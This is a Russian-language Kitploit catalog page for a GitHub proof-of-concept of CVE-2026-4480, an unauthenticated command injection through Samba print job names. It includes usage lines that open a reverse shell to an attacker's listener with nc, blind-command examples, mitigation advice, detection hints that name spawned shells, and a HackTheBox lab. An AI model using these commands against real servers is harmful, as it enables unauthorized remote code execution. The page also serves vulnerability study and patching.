Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-4480-PoC | Kitploit
Инструменты/GitHubGitHub/thecybergeek/cve-2026-4480-poc
ЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubthecybergeek/cve-2026-4480-poc

CVE-2026-4480-PoC

Репозиторий
2152 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-4480: инъекция в print-command (%J) Samba — PoC

Важно — прочтите сначала:
Этот репозиторий и exploit.py предоставлены только в образовательных и исследовательских целях. Не используйте этот код против систем, сетей или сервисов, на которые у вас нет явного письменного разрешения. Несанкционированный доступ к компьютерным системам незаконен и неэтичен. Используя этот код, вы соглашаетесь соблюдать применимые законы и правила учреждений.

Неаутентифицированное удалённое выполнение команд в подсистеме печати Samba. Когда задание печати завершает спулинг, Samba выполняет настроенную print command через system(), подставляя %s (путь к файлу спула) и %J (имя задания, указанное клиентом) в строку. До исправления имя задания передавалось только с преобразованием ' → _ и больше ничем, поэтому |, ;, &, пробелы, <, > и обратные кавычки доходили до шелла. Таким образом, print command, ссылающаяся на %J, является точкой инъекции в шелл, и поскольку гости могут отправлять задания на печать, проблема возникает до аутентификации.

  • CVE: CVE-2026-4480
  • CVSS: 10.0
  • Исправлено в: Samba 4.22.10, 4.23.8, 4.24.3
  • Затронуты: бэкенды печати, запускающие внешнюю print command, которая ссылается на %J (в стиле printing = sysv). Режимы printing = cups / iprint работают через CUPS API и не затронуты.

Требования

  • Linux с Python-привязками Samba:
    root@kitploit:~
    sudo apt install python3-samba
    
  • Сетевой доступ к SMB-порту цели (445/139).
  • Доступная гостям общая папка принтера на цели, чья print command ссылается на %J.

Использование

root@kitploit:~
python3 exploit.py <rhost> <lhost> <lport> [-P PRINTER] [-c CMD]

Обратная оболочка

root@kitploit:~
# terminal 1: listener
nc -lvnp 4444

# terminal 2: fire the exploit
python3 exploit.py 10.129.244.177 10.10.14.100 4444

Вы должны получить оболочку от учётной записи службы печати (например, nobody).

Выполнение одной команды (вслепую)

root@kitploit:~
python3 exploit.py 10.129.244.177 x x -c 'id > /dev/shm/o 2>&1'

Поскольку выполнение происходит вслепую (команда выполняется на стороне сервера и ничего не возвращает по RPC-каналу), сначала подтвердите его внеполосным способом, например, ICMP-колбэком, который вы наблюдаете через tcpdump -ni tun0 icmp:

root@kitploit:~
python3 exploit.py 10.129.244.177 x x -c 'ping -c 3 10.10.14.100'

Обнаружение / смягчение

  • Обновитесь до 4.22.10 / 4.23.8 / 4.24.3 (или новее).
  • Если обновиться невозможно, заключите макрос в кавычки: print command = /usr/local/bin/print-helper %s '%J', уберите %J или перейдите на printing = cups.
  • Ищите smbd, порождающий оболочки (sh/bash/nc/python/curl), и имена документов, содержащие шелл-метасимволы.

Практика на HackTheBox

Я создал машину на HackTheBox под названием Abducted, чтобы продемонстрировать эту уязвимость и дать вам практический пример того, как атакующие могут использовать её в некорректно настроенном окружении.

Скачать инструмент
Аргумент / опцияЗначение
rhostЦелевой хост / IP Samba
lhostIP вашего слушателя
lportПорт вашего слушателя
-P, --printerИмя гостевой общей папки принтера (по умолчанию: HP-Reception)
-c, --cmdВыполнить произвольную команду вместо reverse shell